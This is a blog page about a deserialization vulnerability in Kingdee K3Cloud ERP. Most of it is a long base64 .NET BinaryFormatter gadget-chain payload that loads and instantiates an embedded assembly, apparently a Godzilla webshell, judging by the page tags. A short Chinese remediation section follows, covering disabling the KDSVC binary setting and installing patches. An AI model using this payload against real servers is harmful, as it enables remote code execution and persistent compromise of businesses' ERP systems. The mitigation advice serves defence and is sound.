QBlAAAAZQB1AGUAZABkAHgAcwB5AC4AZABsAGwAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAMAAAAwDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA8AAAAfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgMAAAAERGF0YQlVbml0eVR5cGUMQXNzZW1ibHlOYW1lAQABCAYhAAAA/gFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGIgAAAE5TeXN0ZW0uQ29yZSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQEAAAAAcAAAAJAwAAAAoJJAAAAAoICAAAAAAKCAgBAAAAAREAAAAPAAAABiUAAAD1AlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQEgAAAAcAAAAJBAAAAAoJKAAAAAoICAAAAAAKCAgBAAAAARMAAAAPAAAABikAAADfA1N5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBQAAAAHAAAACQUAAAAKCSwAAAAKCAgAAAAACggIAQAAAAEVAAAADwAAAAYtAAAA5gJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBYAAAAHAAAACQYAAAAJMAAAAAkxAAAACggIAAAAAAoICAEAAAABFwAAAA8AAAAGMgAAAO8BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQGAAAAAcAAAAJBwAAAAoJNQAAAAoICAAAAAAKCAgBAAAAARkAAAAPAAAABjYAAAApU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5QYWdlZERhdGFTb3VyY2UEAAAABjcAAABNU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EQGgAAAAcAAAAJCAAAAAgIAAAAAAgICgAAAAgBAAgBAAgBAAgIAAAAAAEbAAAADwAAAAY5AAAAKVN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uRGVzaWduZXJWZXJiBAAAAAY6AAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHAAAAAUAAAANAgk7AAAACAgDAAAACQsAAAABHQAAAA8AAAAGPQAAADRTeXN0ZW0uUnVudGltZS5SZW1vdGluZy5DaGFubmVscy5BZ2dyZWdhdGVEaWN0aW9uYXJ5BAAAAAY+AAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAeAAAAAQAAAAkJAAAAEB8AAAACAAAACQoAAAAJCgAAABAgAAAAAgAAAAZBAAAAAAlBAAAABCQAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgIAAAAIRGVsZWdhdGUHbWV0aG9kMAMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcglCAAAACUMAAAABKAAAACQAAAAJRAAAAAlFAAAAASwAAAAkAAAACUYAAAAJRwAAAAEwAAAAJAAAAAlIAAAACUkAAAABMQAAACQAAAAJSgAAAAlLAAAAATUAAAAkAAAACUwAAAAJTQAAAAE7AAAABAAAAAlOAAAACU8AAAAEQgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQZQAAAA1QFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZSAAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5BlMAAAAETG9hZAoEQwAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JUwAAAAk+AAAACVIAAAAGVgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkGVwAAAC5TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKFN5c3RlbS5CeXRlW10pCAAAAAoBRAAAAEIAAAAGWAAAAMwCU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAlSAAAABlsAAAAIR2V0VHlwZXMKAUUAAABDAAAACVsAAAAJPgAAAAlSAAAABl4AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpBl8AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpCAAAAAoBRgAAAEIAAAAGYAAAALYDU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGYgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBmMAAAANR2V0RW51bWVyYXRvcgoBRwAAAEMAAAAJYwAAAAk+AAAACWIAAAAGZgAAAEVTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1N5c3RlbS5UeXBlXSBHZXRFbnVtZXJhdG9yKCkGZwAAAJQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmgAAADAAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkJvb2xlYW4sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGagAAAB5TeXN0ZW0uQ29sbGVjdGlvbnMuSUVudW1lcmF0b3IGawAAAAhNb3ZlTmV4dAoBSQAAAEMAAAAJawAAAAk+AAAACWoAAAAGbgAAABJCb29sZWFuIE1vdmVOZXh0KCkGbwAAABlTeXN0ZW0uQm9vbGVhbiBNb3ZlTmV4dCgpCAAAAAoBSgAAAEIAAAAGcAAAAL0CU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZyAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GcwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJcwAAAAk+AAAACXIAAAAGdgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpBncAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQgAAAAKAUwAAABCAAAABngAAADGAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnoAAAAQU3lzdGVtLkFjdGl2YXRvcgZ7AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl7AAAACT4AAAAJegAAAAZ+AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpBn8AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkIAAAACgFOAAAADwAAAAaAAAAAJlN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uQ29tbWFuZElEBAAAAAk6AAAAEE8AAAACAAAACYIAAAAICAAgAAAEggAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL+wCgyQ8m9wsL

修复建议

一、临时缓解方案
8.x版本可通过手动添加安全配置并重启IIS的方式进行缓解,注意管理中心与普通应用配置文件均需添加:

# 普通应用配置:{WebROOT}\Kingdee\K3Cloud\WebSite\App_Data\Common.config
# 管理中心配置:{WebROOT}\Kingdee\K3Cloud\Services\ManagementService\App_Data\Common.config

EnabledKDSVCBinary = false

由于该漏洞不仅影响管理中心(默认8000端口),也影响普通应用(默认80端口)。如果其它版本通过限制访问来源临时缓解漏洞,需要考虑是否会中断普通用户Web业务。


二、升级修复方案
1、7.x版本必须先安装全量补丁(修复代码)后安装临时补丁(添加安全配置)
2、8.x版本管理中心(默认8000端口)默认不对外开放,且包含修复代码。但是直接安装临时补丁可能会失败,所以依旧建议先安装全量补丁(修复代码)后安装临时补丁(添加安全配置)。

标签:kdsvc,管理中心,erp,哥斯拉,补丁,Kingdee,版本,序列化
From: https://www.cnblogs.com/ayoung/p/18551988

相关文章

  • 管家婆ERP集成金蝶云星空(管家婆主供应链)
    源系统成集云目标系统金蝶云星空介绍金蝶云星空是金蝶软件(中国)有限公司研发的新一代战略性企业管理软件,致力于为企业提供端到端的供应链整体解决方案,它可以帮助企业构建敏捷供应链体系,降低供应链成本,提高企业利润。此外,金蝶云星空还可以实现高效组织协作,支持多种模式......
  • 序列化和反序列化的一致性
    序列化和反序列化需要确保算法一致spring-data-redis-客户端,配置,序列化,Pipeline管道_springdataredis配置-CSDN博客   通过RedisTemplate读取Key为stringRedisTemplate的Value,   使用StringRedisTemplate读取Key为redisTemplate的Value:  ......
  • 序列化与反序列化-基本了解使用
    什么是序列化与反序列化        网络传输的数据必须是二进制数据,但调用方请求的出入参数都是对象。对象是不能直接在网络中传输的,所以我们需要提前把它转成可传输的二进制,并且要求转换算法是可逆的,这个过程我们一般叫做“序列化”。这时,服务提供方就可以正确地从二进......
  • Enterprise Architect 的使用手册
    实验八健壮性分析一、创建空的健壮性图选中项目浏览器中的“财神银行自助银行系统”,点击Addapackage按钮为自助银行系统添加一个新的模型包。在弹出的对话框中输入名称为“3-健壮性分析”.点击确定按钮后,选中项目浏览器中的“3-健壮性分析”,点击Create Diagram按......
  • Java序列化与反序列化深度解析
    一、引言在Java开发中,序列化与反序列化是非常重要的概念和技术手段。它允许我们将对象转换为字节流以便于存储或传输,然后在需要的时候再将字节流还原为对象。这一机制在很多场景中都有着广泛的应用,例如数据持久化、分布式系统中的远程方法调用(RMI)、缓存等。本文将深入探讨......
  • Java反序列化-Commons Collections3利用链分析详解
    介绍CC3与CC1和CC6的主要区别在于,CC1和CC6依赖反射机制来执行Runtime.getRuntime().exec()等危险命令,而如果服务器将这些方法列入黑名单,这两种方式就会失效。相比之下,CC3通过类加载器动态加载恶意类来执行危险函数,绕过黑名单限制,从而达到命令执行的目的。公众号:T......
  • 【Pikachu】PHP反序列化RCE实战
    痛是你活着的证明1.PHP反序列化概述在理解PHP中serialize()和unserialize()这两个函数的工作原理之前,我们需要先了解它们各自的功能及其潜在的安全隐患。接下来,我会对相关概念做更详细的扩展解释。1.序列化serialize()序列化(serialization)是指将一个对象或数据......
  • java 反序列化 cc7 复现
    复现环境:common-collections版本<=3.2.1,java版本随意.cc7就是cc6换了一个出口,整体的逻辑没有太大的变化.在Lazymap之前的还那样,我们从如何触发Lazymap的get方法开始看起.AbstractMap看他的equals方法publicbooleanequals(Objecto){if(o==this)ret......
  • 列表数据隔离--采购申请单只能看当前用户的单据信息 过滤,PrepareFilterParameter 2
    region<<版本注释>>/*===================================================类名称:PUR_Requisition_listFilter类描述:列表数据隔离--采购申请单只能看当前用户的单据信息过滤,PrepareFilterParameter创建人:luohong创建时间:2024/11/1516:18:04电子邮箱:it_lu......
  • [转]Windows下编写的shell脚本,传到Linux执行出现bad interpreter:No such file or di
    原文地址:badinterpreter:Nosuchfileordirectory解决方法-jprothwell-博客园在Linux中执行.sh脚本,异常/bin/sh^M:badinterpreter:No such file or directory。分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99